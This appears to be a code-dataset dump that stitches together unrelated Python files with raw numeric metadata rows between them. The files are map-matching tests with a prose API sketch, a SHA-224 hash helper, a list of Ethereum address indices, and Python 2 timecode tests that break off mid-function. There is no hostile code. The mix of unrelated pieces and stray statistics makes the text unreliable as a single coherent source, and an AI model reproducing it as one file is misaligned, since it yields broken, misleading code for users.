mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
show_lattice=True, show_graph=True,
filename=str(directory / f"test_path2_inc_{phase_nb + 2}.png"))
# assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path2_dist():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol_nodes = ['X', 'A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.001,
obs_noise=0.5,
non_emitting_states=False)
matcher.match(path, unique=True)
if directory:
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher,
show_labels=True, show_matching=True, show_graph=True,
filename=str(directory / "test_path2_dist.png"))
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path_outlier():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol = ['A', 'B', 'D', 'C', 'D', 'E', 'F']
path.insert(13, (2.3, 1.8))
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
max_dist_init=1, obs_noise=0.5, obs_noise_ne=10,
non_emitting_states=True)
_, last_idx = matcher.match(path, unique=True)
path_pred = matcher.path_pred_onlynodes
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
with (directory / 'lattice.gv').open('w') as ofile:
matcher.lattice_dot(file=ofile)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
filename=str(directory / "test_path_outlier.png"))
print("Path through lattice:\n" + "\n".join(m.label for m in matcher.lattice_best))
assert last_idx == len(path) - 1
assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
def test_path_outlier2():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path.insert(13, (2.3, -3.0))
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.1,
max_dist_init=1, obs_noise=0.25, obs_noise_ne=1,
non_emitting_states=True)
_, last_idx = matcher.match(path, unique=True)
if directory:
# matcher.print_lattice_stats()
# matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
# with (directory / 'lattice.gv').open('w') as ofile:
# matcher.lattice_dot(file=ofile)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
filename=str(directory / "test_path_outlier2.png"))
assert last_idx == 12
def test_path_outlier_dist():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol = ['A', 'B', 'D', 'C', 'E', 'F']
path.insert(13, (2.3, 1.8))
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
max_dist_init=1, obs_noise=0.5, obs_noise_ne=10,
non_emitting_states=True)
matcher.match(path)
path_pred = matcher.path_pred_onlynodes
if directory:
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher,
show_labels=True, show_matching=True, show_graph=True,
filename=str(directory / "test_path_outlier_dist.png"))
# TODO: Smoothing the observation distances could eliminate the outlier
assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
def test_path3():
path = [(3.0, 3.2), (3.1, 3.8), (3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol = ['E', 'F']
mapdb = InMemMap("map", graph={
"E": ((3, 3), ["F"]),
"F": ((3, 5), ["E"]),
}, use_latlon=False)
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
max_dist_init=1, obs_noise=0.25, obs_noise_ne=10,
non_emitting_states=True)
matcher.match(path, unique=True)
path_pred = matcher.path_pred_onlynodes
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
with (directory / 'lattice.gv').open('w') as ofile:
matcher.lattice_dot(file=ofile)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
filename=str(directory / "test_path3.png"))
print("Path through lattice:\n" + "\n".join(m.label for m in matcher.lattice_best))
assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
def test_path3_dist():
path = [(3.0, 3.2), (3.1, 3.8), (3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol = ['E', 'F']
mapdb = InMemMap("map", graph={
"E": ((3, 3), ["F"]),
"F": ((3, 5), ["E"]),
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
max_dist_init=1, obs_noise=0.25, obs_noise_ne=10,
non_emitting_states=True)
matcher.match(path, unique=True)
path_pred = matcher.path_pred_onlynodes
if directory:
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
filename=str(directory / "test_path3_dist.png"))
print("Path through lattice:\n" + "\n".join(m.label for m in matcher.lattice_best))
assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
if __name__ == "__main__":
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler(sys.stdout))
directory = Path(os.environ.get('TESTDIR', Path(__file__).parent))
print(f"Saving files to {directory}")
test_path1()
# test_path1_dist()
# test_path2()
# test_path2_inc()
# test_path2_dist()
# test_path_outlier()
# test_path_outlier2()
# test_path_outlier_dist()
# test_path3()
# test_path3_dist()
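Every test above follows the same pattern: build an InMemMap, run a matcher over an observed path, and compare path_pred_onlynodes against a known node sequence. A condensed, runnable sketch using the same API and the two-node map from test_path3_dist:

from leuvenmapmatching.map.inmem import InMemMap
from leuvenmapmatching.matcher.distance import DistanceMatcher

mapdb = InMemMap("mini", graph={
    "E": ((3, 3), ["F"]),
    "F": ((3, 5), ["E"]),
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
                          max_dist_init=1, obs_noise=0.25, obs_noise_ne=10,
                          non_emitting_states=True)
matcher.match([(3.0, 3.2), (3.1, 3.8), (3.0, 4.0), (3.1, 4.6), (3.0, 4.9)],
              unique=True)
print(matcher.path_pred_onlynodes)  # expected: ['E', 'F']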
| 45.646277
| 101
| 0.48657
| 2,731
| 17,163
| 2.922373
| 0.062981
| 0.017542
| 0.010525
| 0.009021
| 0.867435
| 0.863426
| 0.855657
| 0.847638
| 0.841373
| 0.840371
| 0
| 0.082652
| 0.265455
| 17,163
| 375
| 102
| 45.768
| 0.550409
| 0.068519
| 0
| 0.803279
| 0
| 0
| 0.07591
| 0.019244
| 0
| 0
| 0
| 0.002667
| 0.036066
| 1
| 0.032787
| false
| 0
| 0.062295
| 0
| 0.095082
| 0.059016
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4af8af8d74f1c76e909285d780419f5abf36f548
| 440
|
py
|
Python
|
hash/hash_sha224.py
|
gorgeousbubble/Nightmare
|
b374b48877898b6193081b7a8a6d2fb571816c75
|
[
"Apache-2.0"
] | 1
|
2019-10-24T15:47:18.000Z
|
2019-10-24T15:47:18.000Z
|
hash/hash_sha224.py
|
gorgeousbubble/Nightmare
|
b374b48877898b6193081b7a8a6d2fb571816c75
|
[
"Apache-2.0"
] | null | null | null |
hash/hash_sha224.py
|
gorgeousbubble/Nightmare
|
b374b48877898b6193081b7a8a6d2fb571816c75
|
[
"Apache-2.0"
] | 3
|
2019-10-24T15:47:25.000Z
|
2020-11-01T01:26:41.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
def hash_sha224(s):
sha224 = hashlib.sha224()
sha224.update(s.encode('utf-8'))
return sha224.hexdigest()
def hash_sha224_encode(s):
sha224 = hashlib.sha224()
sha224.update(s.encode('utf-8'))
return sha224.hexdigest()
def hash_sha224_check(s, r):
sha224 = hashlib.sha224()
sha224.update(s.encode('utf-8'))
return sha224.hexdigest() == r
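A quick sanity check for the helpers above, using the standard NIST test vector for SHA-224 of 'abc' (note that hash_sha224_encode is an identical alias of hash_sha224):

if __name__ == '__main__':
    digest = hash_sha224('abc')
    # NIST test vector for SHA-224("abc")
    assert digest == '23097d223405d8228642a477bda255b32aadbce4bda0b3f7e36c9da7'
    assert hash_sha224_encode('abc') == digest
    assert hash_sha224_check('abc', digest)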
| 20
| 36
| 0.654545
| 61
| 440
| 4.639344
| 0.311475
| 0.056537
| 0.137809
| 0.265018
| 0.766784
| 0.766784
| 0.766784
| 0.766784
| 0.766784
| 0.766784
| 0
| 0.138122
| 0.177273
| 440
| 21
| 37
| 20.952381
| 0.643646
| 0.097727
| 0
| 0.615385
| 0
| 0
| 0.037975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0.076923
| 0
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
ab4a350db96dbb433da3f3edec2ff218f8d1d619
| 279
|
py
|
Python
|
ilf/fuzzers/imitation/addr_map.py
|
ConstantinHvber/ilf
|
b706f81191508998d443c1c89e8d10028ce4e5d8
|
[
"Apache-2.0"
] | 84
|
2019-11-29T08:32:41.000Z
|
2022-03-30T01:43:23.000Z
|
ilf/fuzzers/imitation/addr_map.py
|
edolele/ilf
|
ddd15f201d451d62b94fb45fee7266fb579ab787
|
[
"Apache-2.0"
] | 14
|
2019-12-30T15:54:00.000Z
|
2022-03-14T09:37:15.000Z
|
ilf/fuzzers/imitation/addr_map.py
|
edolele/ilf
|
ddd15f201d451d62b94fb45fee7266fb579ab787
|
[
"Apache-2.0"
] | 20
|
2020-01-04T05:54:33.000Z
|
2022-03-29T14:11:43.000Z
|
ADDR_MAP = {
"0x2fe5e54e71755a9719fd5b06c8697cefa1283165": 0,
"0x9b4ffb882b897fd506116cfb02362af19c96512d": 1,
"0x86c5593ac99644f476986488abaaba94dd00a584": 2,
"0x0c1d67ee5b4654fe0341e5897ec11d62bc29cf5c": 3,
"0xf392acadbf35d37f68a3ee991beb593188036763": 4,
}
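An illustrative one-liner (not part of the module): since ADDR_MAP assigns each contract address a dense integer id, the reverse lookup is just the inverted dict.

IDX_TO_ADDR = {idx: addr for addr, idx in ADDR_MAP.items()}
assert IDX_TO_ADDR[0] == "0x2fe5e54e71755a9719fd5b06c8697cefa1283165"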
| 39.857143
| 52
| 0.799283
| 12
| 279
| 18.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.565041
| 0.11828
| 279
| 7
| 53
| 39.857143
| 0.337398
| 0
| 0
| 0
| 0
| 0
| 0.75
| 0.75
| 0
| 0
| 0.75
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ab566ba9992c4123f837c3498435a1adc2737ccf
| 22,194
|
py
|
Python
|
tests/test_pytimecode.py
|
bantonj/PyTimeCode
|
aac1a3eebcb689d49c0f21fa9138f7d5d719303a
|
[
"MIT"
] | 13
|
2015-03-13T16:04:43.000Z
|
2022-03-23T02:48:54.000Z
|
tests/test_pytimecode.py
|
bantonj/PyTimeCode
|
aac1a3eebcb689d49c0f21fa9138f7d5d719303a
|
[
"MIT"
] | 1
|
2016-06-03T00:31:11.000Z
|
2018-05-01T15:43:14.000Z
|
tests/test_pytimecode.py
|
bantonj/PyTimeCode
|
aac1a3eebcb689d49c0f21fa9138f7d5d719303a
|
[
"MIT"
] | 7
|
2015-07-06T03:09:03.000Z
|
2021-05-29T17:57:29.000Z
|
"""Testing for pytimecode"""
import pytimecode
class TestPyTimeCode:
def setup_class(self):
""" sets shit up for
"""
pass
def teardown_class(self):
""" teardown any state that was previously setup
with a call to setup_class.
"""
pass
def test_instan(self):
timeobj = pytimecode.PyTimeCode('24', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('23.98', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('29.97', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('30', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('60', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('59.94', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('ms', '03:36:09:230')
timeobj = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
def test_repr_overload(self):
timeobj = pytimecode.PyTimeCode('24', '01:00:00:00')
assert timeobj.__repr__() == '01:00:00:00'
timeobj = pytimecode.PyTimeCode('23.98', '20:00:00:00')
assert timeobj.__repr__() == '20:00:00:00'
timeobj = pytimecode.PyTimeCode('29.97', '00:09:00:00')
assert timeobj.__repr__() == '00:09:00:00'
timeobj = pytimecode.PyTimeCode('30', '00:10:00:00')
assert timeobj.__repr__() == '00:10:00:00'
timeobj = pytimecode.PyTimeCode('60', '00:00:09:00')
assert timeobj.__repr__() == '00:00:09:00'
timeobj = pytimecode.PyTimeCode('59.94', '00:00:20:00')
assert timeobj.__repr__() == '00:00:20:00'
timeobj = pytimecode.PyTimeCode('ms', '00:00:00:900')
assert timeobj.__repr__() == '00:00:00:900'
timeobj = pytimecode.PyTimeCode('24', start_timecode=None, frames=49)
print timeobj.int_framerate
assert timeobj.__repr__() == '00:00:02:01'
def test_timecode_init(self):
tc = pytimecode.PyTimeCode('29.97', '00:00:00:01', drop_frame=True)
assert tc.frames == 1
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23', drop_frame=True)
assert tc.frames == 388703
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23')
assert tc.frames == 389093
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
assert tc.frames == 389093
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
assert tc.frames == 324248
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
assert tc.frames == 778163
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
assert tc.frames == 778163
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
assert tc.frames == 777383
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
assert tc.frames == 311279
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
assert tc.frames == 311279
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 230
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
assert tc.make_timecode() == '00:08:20:00'
tc = pytimecode.PyTimeCode('29.97', start_timecode=None, frames=2589407, drop_frame=True)
assert tc.make_timecode() == '23:59:59:29'
tc = pytimecode.PyTimeCode('29.97', start_timecode=None, frames=2589408, drop_frame=True)
assert tc.make_timecode() == '00:00:00:00'
tc = pytimecode.PyTimeCode('59.94', start_timecode=None, frames=5178815, drop_frame=True)
assert tc.make_timecode() == '23:59:59:59'
tc = pytimecode.PyTimeCode('59.94', start_timecode=None, frames=5178816, drop_frame=True)
assert tc.make_timecode() == '00:00:00:00'
def test_frame_to_tc(self):
tc = pytimecode.PyTimeCode('29.97', '00:00:00:01', drop_frame=True)
tc.frames_to_tc()
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 0
assert tc.mins == 0
assert tc.secs == 0
assert tc.frs == 1
assert tc.make_timecode() == '00:00:00:01'
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23', drop_frame=True)
tc.frames_to_tc()
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
tc.frames_to_tc()
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 230
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
assert tc.make_timecode() == '00:08:20:00'
assert tc.hrs == 0
assert tc.mins == 8
assert tc.secs == 20
assert tc.frs == 0
def test_drop_frame(self):
tc = pytimecode.PyTimeCode('59.94', '13:36:59:59', drop_frame=True)
timecode = tc.next()
assert timecode == "13:37:00:04"
tc = pytimecode.PyTimeCode('29.97', '13:36:59:29', drop_frame=True)
timecode = tc.next()
assert timecode == "13:37:00:02"
tc = pytimecode.PyTimeCode('59.94', '13:39:59:59', drop_frame=True)
timecode = tc.next()
assert timecode == "13:40:00:00"
tc = pytimecode.PyTimeCode('29.97', '13:39:59:29', drop_frame=True)
timecode = tc.next()
assert timecode == "13:40:00:00"
def test_iteration(self):
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23', drop_frame=True)
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:11:27"
assert tc.frames == 388767
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:11:23"
assert tc.frames == 389153
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:11:23"
assert tc.frames == 389153
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:12:08"
assert tc.frames == 324308
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:10:23"
assert tc.frames == 778223
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:10:23"
assert tc.frames == 778223
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:10:27"
assert tc.frames == 777447
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:12:11"
assert tc.frames == 311339
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:12:11"
assert tc.frames == 311339
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
for x in range(60):
t = tc.next()
assert t
assert t == '03:36:09:290'
assert tc.frames == 12969290
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
for x in range(60):
t = tc.next()
assert t
assert t == "00:08:22:12"
assert tc.frames == 12060
def test_op_overloads_add(self):
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '00:00:29:23', drop_frame=True)
d = tc + tc2
f = tc + 893
print tc.frames, tc2.frames
assert d.make_timecode() == "03:36:39:18"
assert d.frames == 389598
assert f.make_timecode() == "03:36:39:18"
assert f.frames == 389598
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('29.97', '00:00:29:23')
d = tc + tc2
f = tc + 893
assert d.make_timecode() == "03:36:39:16"
assert d.frames == 389986
assert f.make_timecode() == "03:36:39:16"
assert f.frames == 389986
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('30', '00:00:29:23')
d = tc + tc2
f = tc + 893
assert d.make_timecode() == "03:36:39:16"
assert d.frames == 389986
assert f.make_timecode() == "03:36:39:16"
assert f.frames == 389986
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('25', '00:00:29:23')
d = tc + tc2
f = tc + 748
assert d.make_timecode() == "03:36:39:21"
assert d.frames == 324996
assert f.make_timecode() == "03:36:39:21"
assert f.frames == 324996
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('59.94', '00:00:29:23')
d = tc + tc2
f = tc + 1763
assert d.make_timecode() == "03:36:38:46"
assert d.frames == 779926
assert f.make_timecode() == "03:36:38:46"
assert f.frames == 779926
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('60', '00:00:29:23')
d = tc + tc2
f = tc + 1763
assert d.make_timecode() == "03:36:38:46"
assert d.frames == 779926
assert f.make_timecode() == "03:36:38:46"
assert f.frames == 779926
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
tc2 = pytimecode.PyTimeCode('59.94', '00:00:29:23', drop_frame=True)
d = tc + tc2
f = tc + 1763
assert d.make_timecode() == "03:36:38:50"
assert d.frames == 779150
assert f.make_timecode() == "03:36:38:50"
assert f.frames == 779150
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('23.98', '00:00:29:23')
d = tc + tc2
f = tc + 719
assert d.make_timecode() == "03:36:39:22"
assert d.frames == 311998
assert f.make_timecode() == "03:36:39:22"
assert f.frames == 311998
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('23.98', '00:00:29:23')
d = tc + tc2
f = tc + 719
assert d.make_timecode() == "03:36:39:22"
assert d.frames == 311998
assert f.make_timecode() == "03:36:39:22"
assert f.frames == 311998
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
tc2 = pytimecode.PyTimeCode('ms', '01:06:09:230')
d = tc + tc2
f = tc + 719
print tc.frames, tc2.frames, d.frames
assert d.make_timecode() == "04:42:18:460"
assert d.frames == 16938460
assert f.make_timecode() == "03:36:09:949"
assert f.frames == 12969949
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
tc2 = pytimecode.PyTimeCode('24', start_timecode=None, frames=485)
d = tc + tc2
f = tc + 719
assert d.make_timecode() == "00:08:40:05"
assert d.frames == 12485
assert f.make_timecode() == "00:08:49:23"
assert f.frames == 12719
def test_op_overloads_mult(self):
tc = pytimecode.PyTimeCode('29.97', '00:00:09:23', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '00:00:29:23', drop_frame=True)
d = tc * tc2
f = tc * 4
print tc.frames, tc2.frames
assert d.make_timecode() == "02:25:30:13"
assert d.frames == 261651
assert f.make_timecode() == "00:00:39:02"
assert f.frames == 1172
tc = pytimecode.PyTimeCode('29.97', '00:00:09:23')
tc2 = pytimecode.PyTimeCode('29.97', '00:00:29:23')
d = tc * tc2
f = tc * 4
assert d.make_timecode() == "02:25:21:19"
assert d.frames == 261649
assert f.make_timecode() == "00:00:39:02"
assert f.frames == 1172
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('30', '00:00:29:23')
d = tc * tc2
f = tc * 893
assert d.make_timecode() == "01:13:21:19"
assert d.frames == 132049
assert f.make_timecode() == "01:13:21:19"
assert f.frames == 132049
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('25', '00:00:29:23')
d = tc * tc2
f = tc * 748
assert d.make_timecode() == "06:51:40:04"
assert d.frames == 617504
assert f.make_timecode() == "06:51:40:04"
assert f.frames == 617504
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('59.94', '00:00:29:23')
d = tc * tc2
f = tc * 1763
assert d.make_timecode() == "15:23:42:49"
assert d.frames == 3325369
assert f.make_timecode() == "15:23:42:49"
assert f.frames == 3325369
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('60', '00:00:29:23')
d = tc * tc2
f = tc * 1763
assert d.make_timecode() == "15:23:42:49"
assert d.frames == 3325369
assert f.make_timecode() == "15:23:42:49"
assert f.frames == 3325369
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
tc2 = pytimecode.PyTimeCode('59.94', '00:00:29:23', drop_frame=True)
